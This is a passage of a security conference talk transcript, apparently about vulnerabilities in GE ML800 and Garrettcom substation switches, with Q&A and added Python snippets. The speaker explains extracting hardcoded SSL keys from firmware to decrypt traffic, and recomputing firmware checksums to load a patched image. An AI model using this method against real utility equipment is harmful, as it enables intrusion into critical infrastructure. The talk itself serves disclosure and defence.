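Why the lack of forward secrecy matters here: with static-RSA key exchange, recorded traffic stays decryptable forever once the private key leaks. A toy illustration with deliberately tiny, insecure numbers (requires Python 3.8+ for the modular inverse); this is a conceptual sketch, not the actual TLS handshake math:

```python
# Toy RSA, purely to illustrate the forward-secrecy problem: a passive
# eavesdropper records the encrypted session secret today and decrypts
# it whenever the hardcoded private key turns up, e.g. carved out of a
# firmware image downloaded from the vendor's website.
p, q, e = 61, 53, 17
n = p * q                              # public modulus
d = pow(e, -1, (p - 1) * (q - 1))      # private exponent (Python 3.8+)

premaster = 42                         # stand-in for a TLS pre-master secret
recorded = pow(premaster, e, n)        # what the eavesdropper captures

# Later: the key is extracted from the downloadable firmware...
recovered = pow(recorded, d, n)
assert recovered == premaster          # every old session is now readable
```

An ephemeral Diffie-Hellman exchange avoids this, because the session secret never travels under the long-term key.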
  • 28:37 - 28:42
    Now you don't have to be lucky and have
    concerned citizens send you an email. You
  • 28:42 - 28:46
    can download this image from the GE website
    and you can carve the keys out of the
  • 28:46 - 28:50
    image in the same way that I did and
    decrypt the SSL traffic of any pcap that
  • 28:50 - 29:02
    is sent to you. Now the passwords
    underneath that are in clear text. You can
  • 29:02 - 29:08
    see them highlighted down here. Password
    Manager and user manager. You can see them
  • 29:08 - 29:13
    up there as well and you can see that
    we've decrypted the SSL with that key. So
  • 29:13 - 29:17
    default keys, right? Is it a big deal? I
    believe the vendors in this case say you
  • 29:17 - 29:21
    can upload your own key to the device. For
    those of you who aren't used to working in
  • 29:21 - 29:24
    embedded it sometimes is difficult to
    generate a key on the device because you
  • 29:24 - 29:28
    don't have enough memory or you don't have
    enough entropy or you don't have enough
  • 29:28 - 29:32
    processing power. That's the usual
    excuses. And they're true I shouldn't say
  • 29:32 - 29:36
excuses; those things are true. But
    you could of course generate it on the
  • 29:36 - 29:40
    client side and upload it to the device
    and that's what they allow you to do with
  • 29:40 - 29:45
    this switch which is great but where is
    your encrypted channel in which to upload
  • 29:45 - 29:53
    this key? laughs So you can use the serial
    device and make sure visually that there's no man
  • 29:53 - 29:55
    in the middle. But if you're doing this
    remotely – and I'd like you to keep in
  • 29:55 - 29:59
    mind that most substations are remote –
    if anyone here works in a utility are you
  • 29:59 - 30:04
    going to drive to every substation, plug
    in a serial cable to change the keys on
  • 30:04 - 30:08
    all these devices? It's the sort of thing
    you need to know in advance right? So the
  • 30:08 - 30:12
    problem with key management, particularly
    with SSL and the industrial systems
  • 30:12 - 30:19
    environment, is that you have to manage
    the keys. And these particular keys, well
  • 30:19 - 30:24
    the certificates are self signed so you
    can't revoke them. And besides industrial
  • 30:24 - 30:27
    systems are never connected to the
    Internet. So it wouldn't have made any
  • 30:27 - 30:32
    difference. So these are the kind of
    problems we're dealing with in this space.
  • 30:32 - 30:35
    And that's why I'm trying to encourage
    you. Whether you do crypto or privacy or
  • 30:35 - 30:38
    whatever spend a little time in the
embedded space, just for a bit: there's
  • 30:38 - 30:46
    plenty of easy work. OK. So what about the
    second key. It requires a password. I
  • 30:46 - 30:51
    didn't feel like brute forcing it. Maybe
    you do. I don't know. I tried all the
  • 30:51 - 30:54
    strings in the image. A classic technique,
just in case someone had hard-coded the
  • 30:54 - 30:57
    password. I mean the hard coded
    credentials were there but not the hard
  • 30:57 - 31:00
    coded password. So I guess I gotta start
    reversing, and as I previously said I suck
  • 31:00 - 31:06
    at reversing. That's why I come to CCC, so
    I can learn, right? But I did find this
  • 31:06 - 31:12
PowerPC ROM image, and I think it's running
eCos and RedBoot, and I haven't even gotten
  • 31:12 - 31:15
    down to doing hardware stuff: taking it
apart, having a look at it, but I probably
  • 31:15 - 31:19
    will in the future. So there's the image
    I'm slowly starting to learn my way around
  • 31:19 - 31:27
    and figure out what's going on. So I had a
    look at the image and I figured out that
  • 31:27 - 31:32
    this key is used for SSH, right? Well it
    would be the other encrypted thing. But I
  • 31:32 - 31:36
    couldn't enable SSH on the device. I try
    and enable SSH on the device and I'm
  • 31:36 - 31:39
logged in as manager, by the way, which is
the highest-level user on this particular
  • 31:39 - 31:44
    device, and I put it in the passwords that
    I know and a bunch of other passwords and
  • 31:44 - 31:48
    they don't work. Like I said, I tried all
    the strings in the image. So apparently to
  • 31:48 - 31:52
    enable ssh, I need a password for
    something. Now maybe I'm just
  • 31:52 - 31:56
    misunderstanding or I'm not so clear on
    what's going on but I don't know about
  • 31:56 - 31:59
    you. I kind of feel like if I buy a device
    that's supposed to be used for a safety
  • 31:59 - 32:03
    critical process I should be allowed to
    use SSH without having to call up the
  • 32:03 - 32:11
    vendor and get some special magic
    password. So considering I don't like that
  • 32:11 - 32:17
    approach. What if I patched my own key
    into the image right. I don't know the
  • 32:17 - 32:22
    password of their key but I know the
    password of a key I can generate. So I
  • 32:22 - 32:27
    just need to make sure it's roughly the
    right size and try and patch it in. Then
  • 32:27 - 32:30
    I've got some problems with compression
    because I've got to reverse the whole
  • 32:30 - 32:34
    process that I just described to you patch
    it into the larger binary. Will there be
  • 32:34 - 32:44
    any CRC or firmware signing? I don't know,
    right. So the uploaded image is not a
  • 32:44 - 32:51
    valid image for this device. That's
    correct: I messed with it. But I got this
  • 32:51 - 32:54
    error and it gave me a clue. It gave me a
    clue that I did indeed have some of my
  • 32:54 - 33:02
    CRCs wrong so when I altered the image
    again I got to this state. So you're
  • 33:02 - 33:06
    learning all the time by having a real
    device. Now some of my friends they do
  • 33:06 - 33:10
    static analysis and they don't buy these
    devices. I decided to buy this one. I
  • 33:10 - 33:16
    found one on eBay. It wasn't very
    expensive. I mean it depends on your range
  • 33:16 - 33:20
    for expensive. But if you're helping
    defend industrial systems I thought it was
  • 33:20 - 33:27
    worth the money. So I bought it and this
    enables me to try firmware images out and
  • 33:27 - 33:31
    I can slowly start to figure out what I
    need to patch on these firmware images to
  • 33:31 - 33:37
    do whatever I want. Luckily I just tried
    to patch mine to have SSH because I
  • 33:37 - 33:44
    thought people deserve to have SSH. So
that's an Adler-32 up there on the left
  • 33:44 - 33:50
and the other CRC is on the bottom, so that
Adler-32 and some adjustment of file
  • 33:50 - 33:54
length, and all those zeros in that line just
above it, eventually got me to the point
  • 33:54 - 34:00
    where it believes it's a corrupted binary.
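Both of those checksums happen to live in Python's zlib module, so recomputing them over a patched payload is trivial; splicing them back in at the right offsets is the device-specific part. The big-endian packing here is an assumption for illustration, not the ML800's documented layout:

```python
import struct
import zlib

def fix_checksums(payload):
    """Recompute Adler-32 and CRC-32 over a patched payload and
    return them packed big-endian, ready to splice into the image."""
    adler = zlib.adler32(payload) & 0xFFFFFFFF
    crc = zlib.crc32(payload) & 0xFFFFFFFF
    return struct.pack(">I", adler), struct.pack(">I", crc)
```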
    And then we have this CRC on the end that
  • 34:00 - 34:08
    we need to have a look at. Now I'm a big
    fan of suspense. I love suspense. I'm
  • 34:08 - 34:15
going to leave that one as a cliffhanger
    and an exercise for you watching. So I
  • 34:15 - 34:18
    said I was going to talk about GE ML800
    but I'm also going to talk about
  • 34:18 - 34:21
    Garrettcom. Luckily it's not very
    difficult. Garrettcom is the original
  • 34:21 - 34:27
    equipment manufacturer for the GE ML800
    series. I noticed that because the
  • 34:27 - 34:31
    certificate I found attached to those
    private keys said Garrettcom in it and I
  • 34:31 - 34:36
    went and looked at their firmware images
and they have similar CRCs, similar file
  • 34:36 - 34:40
structures, similar everything, so I believe
    that they are affected by the cross site
  • 34:40 - 34:46
    scripting, the denial of service, and
    hardcoded keys. I understand from some
  • 34:46 - 34:51
    people that they have been in contact with
    GE to try and fix some of this stuff but
  • 34:51 - 34:58
the response from GE was mainly "Sorry,
    this is the end of life on this device".
  • 34:58 - 35:03
    That's fine. I understand you're running a
    business but you're selling equipment to
  • 35:03 - 35:08
    people who manage utilities that we all
    depend on. If Sony goes bankrupt because
  • 35:08 - 35:14
    they get hacked that's one thing right.
    But you can't just dissolve a utility and
  • 35:14 - 35:19
    start again. As my friend Klaus points out
    regularly – fantastic insights into the
  • 35:19 - 35:23
    industrial system world, Klaus and Vanessa
    – you can't just dissolve the utility and
  • 35:23 - 35:26
    start again. You still have the same
    infrastructure you still have the same
  • 35:26 - 35:31
    workers. It doesn't work that way. You
    can't bail out utilities that we depend
  • 35:31 - 35:38
    on. So sorry. End of Life... I don't even
    understand why people buy these devices
  • 35:38 - 35:43
    and this code without code escrow. When
    you buy the code make sure you have the
  • 35:43 - 35:49
    code in perpetuity for these systems so
    that you can fix them when something like
  • 35:49 - 35:54
    this or something worse happens. If I'm
    your worst nightmare, you have real
  • 35:54 - 35:59
    problems because there are very dark
    people in the world actually damaging
  • 35:59 - 36:05
    furnaces in Germany. So me disclosing keys
    on stage is scary for you. You need to get
  • 36:05 - 36:13
a grip. So, Garrettcom?
    Here's your key too.
  • 36:13 - 36:20
    Applause
  • 36:20 - 36:26
    The strings come from the images.
    Developers are funny people really. I like
  • 36:26 - 36:32
    this. I just put them up because they're
    funny. Some people had some hard times, I
  • 36:32 - 36:36
    guess, writing some of this code. And my
    respect to them! They do great work but
  • 36:36 - 36:43
    you know, there's a couple of things we
    can improve on security in these devices.
  • 36:43 - 36:48
    So I once had the opportunity to stand in
    front of six different vendors at the same
  • 36:48 - 36:53
    time their computer emergency response
    teams at a conference and I said to them,
  • 36:53 - 37:00
    "Will any of you commit to an average
    patch time for vulnerabilities of three
  • 37:00 - 37:05
    months?" An average patch time, because it
    might take 8 months, as it so far has
  • 37:05 - 37:10
    taken in the case of GE and Garrettcom, to
    work on these issues. It might take a long
  • 37:10 - 37:15
    time in some cases but as an average patch
    time I think 3 months for things that we
  • 37:15 - 37:20
    all depend on is reasonable. So I asked
    these six different teams in the same
  • 37:20 - 37:29
    room. If any of them would commit to this
    and I heard silence for 30 seconds. So my
  • 37:29 - 37:35
    friend decided to call this the silence of
the vendors, right. And I think that
  • 37:35 - 37:42
    sums it up. I'd like to see better patch
times. I'd like to see computer
  • 37:42 - 37:45
    emergency response teams in each of these
    vendors and I'd like to see someone
  • 37:45 - 37:54
    responsible for security in each of these
    different utilities. I can dream, right? I
  • 37:54 - 37:57
    think that key management... the current
practice in industrial systems is to take
  • 37:57 - 38:03
    some insecure protocol and wrap it in SSL
    or TLS which is why we need the help of
  • 38:03 - 38:10
    you privacy people because TLS and SSL
    are not the be all and end all. They often
  • 38:10 - 38:16
    sort of go the wrong way, right. For
    example you can use TLS to do integrity
  • 38:16 - 38:21
    without encryption so you can verify that
    every message has reached its destination
  • 38:21 - 38:26
    intact but it is not encrypted. And this
    means that you can still do intrusion
  • 38:26 - 38:33
    detection analysis of the packets. That's
    really good. But nobody uses that in SSL
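The idea of integrity without confidentiality, separate from TLS itself, can be illustrated with a plain HMAC over cleartext messages: an IDS can still read every packet, but tampering is detectable. A conceptual sketch with an illustrative shared key, not a TLS cipher-suite configuration:

```python
import hashlib
import hmac

KEY = b"shared-station-key"            # illustrative only

def seal(message):
    """Cleartext message plus a MAC: inspectable, but tamper-evident."""
    tag = hmac.new(KEY, message, hashlib.sha256).digest()
    return message + tag

def verify(sealed):
    """Strip and check the 32-byte SHA-256 MAC; raise on tampering."""
    message, tag = sealed[:-32], sealed[-32:]
    expected = hmac.new(KEY, message, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("message was altered in transit")
    return message
```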
  • 38:33 - 38:37
    in other ways right. I'm a big fan of
    Shodan and use Shodan for a variety of
  • 38:37 - 38:41
    different things usually to get a sense of
    the Internet as a whole, right? Let me
  • 38:41 - 38:45
    back up a little bit. When I was at
    Cambridge I went to Darwin college and
  • 38:45 - 38:48
    because you're at Darwin college you read
    up a bit on Darwin and you think about how
  • 38:48 - 38:52
    Darwin thought and I think the Internet is
    kind of like that. When it was built by
  • 38:52 - 38:57
    the IETF and various people, who did
    fantastic work, they imagined it one way
  • 38:57 - 39:01
    and then we inherited it and it grew and
    it became an ecosystem and stuff happens
  • 39:01 - 39:05
    out there that you wouldn't expect. And so
    that's why I like Shodan. It's kind of
  • 39:05 - 39:10
like being a natural scientist: doing a
survey of the world, what kind of machines
  • 39:10 - 39:13
    are out there, what versions are they
    running, when do people update their SSL..
  • 39:13 - 39:18
err, you know, their certificates: do they
    do it before or after the certificate is
  • 39:18 - 39:23
    invalid. Do they always upgrade the
    algorithm. Do they increase the key size.
  • 39:23 - 39:26
    You know how do things change right you
    need to sort of study it as a whole and
  • 39:26 - 39:30
    that's my point when it comes to just
    taking SSL and slapping it over a
  • 39:30 - 39:38
    protocol. It's not quite that simple. So
    again we need your help. Where can we go
  • 39:38 - 39:42
    with these attacks. And you remember at
    the beginning I pointed out the underpants
  • 39:42 - 39:50
    gnome. The emperor wears no clothes.
    Altering switch configurations is a big
  • 39:50 - 39:57
    deal because you can exfiltrate process
    data. That gives you a map of the process
  • 39:57 - 40:02
    because industrial systems are bespoke.
    Each one of them is different. It does run
  • 40:02 - 40:07
    different traffic and we are lucky to work
    on security in this space because our
  • 40:07 - 40:11
    users are numerate and literate and they
    care about safety. They don't always
  • 40:11 - 40:14
    understand security but they do care about
    safety. So if you can make it a safety
  • 40:14 - 40:18
    concern they care. There are also
engineers at many of these utilities who
  • 40:18 - 40:24
    look at the network 24/7. Not all of them
    but some of them. Can you imagine a home
  • 40:24 - 40:29
    network or something else with that kind
    of user base. We're lucky we should be
  • 40:29 - 40:35
    taking advantage of that user base. So
    getting back to the point you know denial
  • 40:35 - 40:39
    of service attacks to disrupt the process
    go and see Marmusha's talk. This will all
  • 40:39 - 40:43
    make a lot more sense when you go and see
    her talk. Basically any man in the middle
  • 40:43 - 40:48
    attack can disrupt alter or drop traffic
    at this point. If you can affect the
  • 40:48 - 40:52
switches in the substation. And
exfiltrating the data gives you a map
  • 40:52 - 40:58
    of the process which leads towards further
    potential damage for the utilities. Now
  • 40:58 - 41:01
    it's not always that simple people will
    get up on stage and they will tell you I
  • 41:01 - 41:07
    am awesome and this is how it's done and
    it's easy to blow shit up. It's not true.
  • 41:07 - 41:10
    It takes a little bit of thought it takes
    a little bit of work. I am certainly not
  • 41:10 - 41:16
    awesome. I am just a quality assurance
    person from a former vendor. I just
  • 41:16 - 41:23
    decided to get into security and keep
    going with it. So you can't always perform
  • 41:23 - 41:25
    these man in the middle attacks. People
    will say you can. But the reason you can't
  • 41:25 - 41:31
    is real-time system constraints. Some
    systems will stop receiving traffic five
  • 41:31 - 41:35
    milliseconds or microseconds later and
    ignore anything. If a value doesn't arrive
  • 41:35 - 41:39
    in this time it doesn't care. So the idea
    that you can route the traffic out to some
  • 41:39 - 41:44
    other country and then back in and disrupt
    the process is bollocks. Sometimes you
  • 41:44 - 41:48
    have to alter the firmware to achieve
    that. That depends on the process but I'm
  • 41:48 - 41:53
    just trying to give you a sense of how
    performing actual attacks give you a sense
  • 41:53 - 41:56
    of what the limits are, what the
    logistical burdens are for the attacker
  • 41:56 - 42:05
    and that's important stuff for us to know.
    All right. Little bit of an overview.
  • 42:05 - 42:12
Drunk session IDs, brute-forcing
    MD5+NONCE, cross site request forgery for
  • 42:12 - 42:17
    firmware upload (of all things),
    reflected cross-site scripting (8 cases of
  • 42:17 - 42:23
it), pre-authentication denial of service,
    hardcoded keys times 2 in a firmware
  • 42:23 - 42:29
    image, SSL without forward secrecy, self
    signed certificates so there's no revoking
  • 42:29 - 42:32
    there's no managing of the keys on these
    devices right. Not to mention utility
  • 42:32 - 42:36
    workers are busy already. They may not
    have time to manage all of these devices
  • 42:36 - 42:40
    we might need to rethink that approach
    right. Clear text passwords under SSL
  • 42:40 - 42:44
    because well no one can break SSL unless
    you hard code the key in the firmware
  • 42:44 - 42:50
    that's downloadable from the internet.
Enable SSH with a password, and three
  • 42:50 - 42:55
quarters of a year waiting for fixes for
    some of this stuff. I'm not happy with
  • 42:55 - 43:01
    that. I think that we could live in a much
    better, much safer world. And to do so we
  • 43:01 - 43:08
    need to talk very seriously about some of
    these issues. Don't take my opinion for
  • 43:08 - 43:12
    it. Listen to some other people. The best
    thing about doing industrial systems work
  • 43:12 - 43:15
    is the diversity of approach. You know I
    love that there are so many other people
  • 43:15 - 43:20
    doing SCADA and ICS. And I love that
    they're going different directions. So in
  • 43:20 - 43:26
    the future I plan to be on another stage
    with some friends and show you some more.
  • 43:26 - 43:30
    Thank you for listening mustache fans and
    as a parting thought. More tax money is
  • 43:30 - 43:35
    spent on surveillance than on
    defending common utilities.
  • 43:35 - 43:44
Applause
  • 43:44 - 43:51
Herald: Thank you. It made for a scary
Sunday morning. They got a utility *<<
  • 43:51 - 43:58
guess, mostly incomprehensible* down the
    road. OK. We'll have some questions taken
  • 43:58 - 44:06
    please. As the session is recorded and
    streamed anything you say, say it into a
  • 44:06 - 44:17
    mic. Any questions up? Wow, it is Sunday
    morning.
  • 44:17 - 44:18
    Éireann: Number three, sure
  • 44:18 - 44:21
    Herald: everybody understood everything?
    You're kidding me.
  • 44:21 - 44:24
    Éireann: I've got one right here
    Herald: here is a question.
  • 44:24 - 44:30
    Question: Hey thanks I enjoyed your talk
    and I think it's very important to raise
  • 44:30 - 44:38
    awareness. But I think it's not to raise
    awareness. Not much in this community, but
  • 44:38 - 44:44
    within the engineering community and I see
    it a lot of times and many engineers
  • 44:44 - 44:50
    having lots of problems doing that for
    several reasons. There is maybe the
  • 44:50 - 44:55
    engineer who is thinking about this but
has his managers on his back, and has to deal
  • 44:55 - 45:03
    with service personnel which know how to
    work a hammer and a screwdriver and on the
  • 45:03 - 45:11
    other side, engineers have to work with
customers, which are mostly lazy people.
  • 45:11 - 45:16
    And so that's how these things happen. And
    I think it's more important to raise
  • 45:16 - 45:22
    awareness of these kinds of things in the
    engineering community.
  • 45:22 - 45:25
    Éireann: So just to repeat a little bit
    for anybody else that couldn't hear it or
  • 45:25 - 45:29
    for the recording it's very important to
    work with the engineers some of the
  • 45:29 - 45:32
    engineers understand the problem. But
    typically management or lower level
  • 45:32 - 45:38
    service personnel don't always understand
    the problem. And it's not important to
  • 45:38 - 45:42
    raise the awareness in the hacker
    community. But more with the engineers is
  • 45:42 - 45:46
    what you were saying. Right. OK.
    Absolutely true. Completely agree with
  • 45:46 - 45:51
    you. I don't just come to these
    conferences and present to you guys. I go
  • 45:51 - 45:54
    and I present to the engineers too. And in
    fact a couple of engineers have come to
  • 45:54 - 45:59
    this conference because we did work at
    other conferences to see what the hacker
  • 45:59 - 46:02
    community is about and learn things from
    the hacker community because this is a
  • 46:02 - 46:05
    place where you can learn if you're just
    not afraid of getting pwned a couple of
  • 46:05 - 46:11
    times right. And it happens to me too
    right. I learned a lot from getting
  • 46:11 - 46:14
    compromised on my machine and watching
    someone do something. Anyways back to the
  • 46:14 - 46:18
    point I don't just work with engineers or
    hackers. I also work with C-level
  • 46:18 - 46:22
    executives so I'm on a sabbatical from
IOActive at the moment, at the Cambridge
  • 46:22 - 46:26
    Center for Risk studies, and I'm working
    with the insurance people which has its
  • 46:26 - 46:31
    challenges shall we say. But some of them
    are very intelligent people and they want
  • 46:31 - 46:35
    to understand what's going on with hacking
    attacks and they want to approach this
  • 46:35 - 46:41
    from a slightly different angle. My stake
    in that is to be sure that when the
  • 46:41 - 46:45
    insurance people do get involved that they
    actually ask for fixes and improve stuff.
  • 46:45 - 46:50
    So yes I do my best to raise awareness
    wherever I can. And I'm not alone. You can
  • 46:50 - 46:54
    help me.
    Questioner: Thank you
  • 46:54 - 46:58
    applause
  • 46:58 - 47:06
    Herald: OK, there's another question here.
    Number two. Oh, and up there too, yes we
  • 47:06 - 47:09
    saw you. OK number two was first I think.
    Go ahead
  • 47:09 - 47:14
    Question: incomprehensible. So you
    mentioned a couple of things, err a couple
  • 47:14 - 47:18
    of vulnerabilities and I was wondering
    what you would think an ideal system would
  • 47:18 - 47:24
    look like. You mentioned key provisioning
    of course putting certificates. I assume
  • 47:24 - 47:28
    that they were different certificates for
    different devices rather than the same
  • 47:28 - 47:37
    certificate for all devices. Okay that's a bad
thing. And also sort of the way how
  • 47:37 - 47:45
the software update management works. So
if you could give them some
  • 47:45 - 47:49
    advice how to design a system
    how would you do it?
  • 47:49 - 47:55
    Éireann: Okay. So first of all I wouldn't
hard-code the keys, as you discussed,
  • 47:55 - 48:02
    to be in every device the same. It's one
    thing to put in your documentation hey you
  • 48:02 - 48:08
    should update the keys but I mean if I can
patch a binary file with a key then there's
  • 48:08 - 48:11
    no reason you couldn't do that on the
    website where you download the firmware
  • 48:11 - 48:15
    image right. Just as an example as a
    thought experiment sort of makes that
  • 48:15 - 48:18
    clear. The upgrade path for these devices
    is download the firmware image from the
  • 48:18 - 48:25
    website to some machine and then carry it,
because all these systems are airgapped,
  • 48:25 - 48:29
    to some other location and then upload it
    onto the switch right with hardcoded
  • 48:29 - 48:34
    credentials. So first off whenever you
    provision a switch initially you provision
  • 48:34 - 48:37
    all of the credentials for that device.
That's standard practice for many routers
  • 48:37 - 48:42
    and other pieces of equipment today. And I
    would think less about defending and
  • 48:42 - 48:46
    securing the device than on being
    able to regularly check its integrity,
  • 48:46 - 48:49
    the integrity of the firmware that is
    running and the integrity of the
  • 48:49 - 48:54
    configuration. So I'd focus on that and I'd
    focus on being able to recover the switch
  • 48:54 - 48:58
    after it's been attacked. So you reverse
    your thinking. You assume that one day
  • 48:58 - 49:01
    someone is going to crack your firmware
    signing and crack this and crack that and
  • 49:01 - 49:06
    you focus on how can I quickly upload a
    new firmware image that is known to be
  • 49:06 - 49:12
    good and verify that the one that is
    uploaded is good to this device.
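That recovery-first approach can start with something as small as keeping known-good fingerprints and checking dumped images against them. A sketch; the file paths and the idea of an inventory of hashes are hypothetical:

```python
import hashlib

def sha256_file(path):
    """Stream a firmware image and return its SHA-256 fingerprint."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def check_integrity(path, known_good):
    """Compare a dumped image against a known-good fingerprint."""
    return sha256_file(path) == known_good
```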
  • 49:12 - 49:16
    Questioner: Thank you.
    Herald: There was a question up there on
  • 49:16 - 49:19
    the balcony.
    Signal angel: Yes we have two questions
  • 49:19 - 49:26
    here on the net. So the first one is how
    would you solve the end of life issue.
  • 49:26 - 49:30
    Sometimes incomprehensible clients just
get really outdated.
  • 49:30 - 49:33
    Éireann: That's absolutely true and it is
slightly unfair of me to be so hard on the
  • 49:33 - 49:38
    vendors. But it's my job to take the
    debate a little bit too far the other way.
  • 49:38 - 49:43
    So how would I solve the end of life issue
    is the question from the internet. I don't
  • 49:43 - 49:48
    know. I think that's not a technical
    problem it's a societal problem. Like when
  • 49:48 - 49:56
    we buy bridges they are bridges until they
    fall down. When we buy roads they stay
  • 49:56 - 49:59
    there until they go away. I mean there is
    probably some end of life issues in there
  • 49:59 - 50:05
    but it's almost more of a contractual
    legal issue and someone should study that.
  • 50:05 - 50:08
    There are people studying that but it's
    not my area of expertise but I'll try and
  • 50:08 - 50:13
    answer as best I can. I think code escrow
is a good way to go. When you buy some of
  • 50:13 - 50:18
    these devices you say I want the code for
    this device in the future. I want to have
  • 50:18 - 50:22
    access to it. If your company goes
    bankrupt I need you to give up the source
  • 50:22 - 50:26
    code for these devices when you go
    bankrupt or when you disappear or when
  • 50:26 - 50:30
    it's the end of life. There are a couple
    of manufacturers out there doing open
  • 50:30 - 50:35
    source switches. There's a company called
Opengear, who are awesome. They gave me a
  • 50:35 - 50:40
    switch to play with that I haven't had
    time to look at yet. I think that's amazing
  • 50:40 - 50:43
    right. And their code is open source and
    you can go and examine it. So you would
  • 50:43 - 50:46
    have the code anyway. Those are two
    different approaches. I think there are
  • 50:46 - 50:50
    others you can solve this problem
    technically or legally or socially but as
  • 50:50 - 50:56
    a society we depend on these utilities and
    that code should not just vanish when it's
  • 50:56 - 51:05
    difficult or costly to keep it upgraded.
    applause
  • 51:05 - 51:08
    Herald: There was a second
    question from the Internet.
  • 51:08 - 51:14
    Signal angel: Yes, so the second one is:
    what should a non-technical person in
  • 51:14 - 51:20
the respect of incomprehensible a non-
technical person sent to manage a small town
  • 51:20 - 51:25
    utility do as best practice?
    Éireann: I think the first and most
  • 51:25 - 51:30
    important thing is to look for attacks.
    I'm sorry I should probably repeat that
  • 51:30 - 51:34
    question just to be sure. What should
    someone in a small town who manages
  • 51:34 - 51:37
a utility do to defend and protect
themselves. So the first thing is
  • 51:37 - 51:43
    look for attacks. Even if you spend a few
    hours a week looking for something you
  • 51:43 - 51:46
    script something up or you hire some
    college kid to come in and script
  • 51:46 - 51:50
    something and look for things on your
    network and ask questions and yes they're
  • 51:50 - 51:52
going to be a pain in the ass and it's going
    to be difficult. But you're going to learn
  • 51:52 - 51:56
    things about your network and you might
    detect some attacks. The first problem in
  • 51:56 - 52:01
    utilities is no one is responsible for
    security. It's not my job. It's kind of
  • 52:01 - 52:05
the mantra. So for a small utility, find
someone whose job it is. If you're a very
  • 52:05 - 52:09
    small utility there's probably some other
    small utilities near you and you can hire
  • 52:09 - 52:14
    a resource together to come and visit your
    different utilities and help you out. The
  • 52:14 - 52:17
    second one is watch your relationship with
your vendor. When you purchase this
  • 52:17 - 52:21
    equipment you spend a lot of money on it.
    Spend a little bit of time doing
  • 52:21 - 52:25
    penetration tests. Yes I like it when you
    hire me but you don't have to hire me.
  • 52:25 - 52:28
    There are plenty of other people you can
    hire who will have a look at the device
  • 52:28 - 52:32
    and find the simple vulnerabilities. So
    when you purchase something, make sure you
  • 52:32 - 52:35
    test it for security purposes. That's
    very important, because you can even put
  • 52:35 - 52:41
    into your contract: if you fail the
    security tests, we will pay you less money.
  • 52:41 - 52:44
    And the vendors are not going to react
    to security until you do that. So that's
  • 52:44 - 52:51
    the second answer. And I wish I had a
    third to make it very neat but I don't.
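The "script something up and look for things on your network" advice could start as small as this. A minimal, hypothetical sketch: the known-hosts inventory is something you maintain by hand, and the observed list would come from your own records, e.g. parsed `arp -a` output or a packet capture (both of those sources are assumptions, not shown here).

```python
# Sketch: flag devices seen on the network that are not in your inventory.
# The MAC addresses below are made up for illustration.

def find_unknown_hosts(observed, known_hosts):
    """Return MAC addresses seen on the wire that are not in the inventory."""
    return sorted(set(observed) - set(known_hosts))

known_hosts = {
    "00:1a:2b:3c:4d:5e",  # PLC in hall A
    "00:1a:2b:3c:4d:5f",  # engineering workstation
}

observed = [
    "00:1a:2b:3c:4d:5e",
    "de:ad:be:ef:00:01",  # not in the inventory -- worth asking questions about
]

for mac in find_unknown_hosts(observed, known_hosts):
    print("unknown device:", mac)
```

Even something this crude forces the questions Éireann describes: what is on my network, and why?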
  • 52:51 - 52:56
    Herald: OK. There was one more
    question at mic 4 I think
  • 52:56 - 52:58
    Questioner: Yes hi thank you for
    your time.
  • 52:58 - 53:04
    Herald: Talk into the mike, please.
    Questioner: Thank you for your talk.
    Hi, I'm kind of a
  • 53:04 - 53:13
    newbie to the C3 community and I am not
    sure about the question I want to ask you.
  • 53:13 - 53:17
    Probably many people in this room
    understand it, but I don't. I would like to
  • 53:17 - 53:24
    ask you: what exactly do you
    mean by arbitrary firmware?
  • 53:24 - 53:29
    Éireann: No problem. So the question was:
    what do you mean by arbitrary firmware? I
  • 53:29 - 53:34
    mean firmware that I have altered, that
    was not manufactured by the vendor, to do
  • 53:34 - 53:39
    whatever I want. How do you trust that
    this switch sends all the packets that it
  • 53:39 - 53:45
    should send? What if, you know, my
    handle is BSB, right? What if it drops
  • 53:45 - 53:51
    every packet that has BSB in it?
    Right. You can rewrite a firmware image to
  • 53:51 - 53:55
    do whatever the device can do, and in some
    cases more things than the device usually
  • 53:55 - 54:00
    does, to damage itself for example. So an
    arbitrary firmware is one in which anyone
  • 54:00 - 54:03
    writes the firmware and there is no
    checking to be sure that this is the image
  • 54:03 - 54:08
    that you want on this device, whether it's
    provided by the vendor or the community,
  • 54:08 - 54:13
    right? You still want checking that this
    is the correct code, or the code that you
  • 54:13 - 54:18
    wanted anyway. Right.
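The "checking" Éireann describes can be sketched in its simplest form: verify a firmware image against a known-good digest obtained out-of-band before flashing it. This is a hypothetical illustration, not any vendor's actual mechanism; the image bytes and the digest source are made up. Note that a plain hash only helps if the digest comes over a trusted channel; a signature scheme is stronger.

```python
# Sketch: refuse firmware that does not match a known-good SHA-256 digest.

import hashlib

def firmware_matches(image_bytes, expected_sha256):
    """Return True only if the image hashes to the known-good digest."""
    return hashlib.sha256(image_bytes).hexdigest() == expected_sha256

image = b"\x7fFIRMWARE-IMAGE-CONTENTS"        # would be read from disk
expected = hashlib.sha256(image).hexdigest()  # vendor would publish this out-of-band

assert firmware_matches(image, expected)                  # untouched image passes
assert not firmware_matches(image + b"tampered", expected)  # altered image fails
```

Without a check like this, any image that the bootloader accepts is "arbitrary firmware" in the sense used above.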
    Herald: Okay thank you. Is that a question
  • 54:18 - 54:22
    here mic 1? OK go ahead.
    Questioner: Yes please. In your
  • 54:22 - 54:30
    hypothetical question, you asked what
    damage could I do in that paint factory.
  • 54:30 - 54:40
    But you can also reverse it. What kind of
    company secrets can I obtain for example,
  • 54:40 - 54:46
    your favorite recipe for your hot
    chocolate or the recipes of Coca-Cola.
  • 54:46 - 54:53
    They are vulnerable as well, aren't they?
    Éireann: Yes. So, the question again
  • 54:53 - 54:57
    for everyone else: you don't just have to
    talk about damage in a paint factory or
  • 54:57 - 55:02
    any industrial system. You can also talk
    about intellectual property and protecting
  • 55:02 - 55:07
    the recipes that we use to bake cookies or
    make beer or whatever, pharmaceuticals,
  • 55:07 - 55:13
    whatever. And that's a fantastic question
    and I'm glad you brought it up. A couple of
  • 55:13 - 55:16
    years ago when I was doing... well, more
    than a couple of years, like eight years
  • 55:16 - 55:19
    ago, when I was doing industrial system
    security, I realized I wasn't getting a lot
  • 55:19 - 55:23
    of traction. It was before Stuxnet; I was
    a quality assurance guy. Everybody thought
  • 55:23 - 55:34
    I was fucking crazy, right? Then Stuxnet:
    career. It's wrong. It's really wrong. But
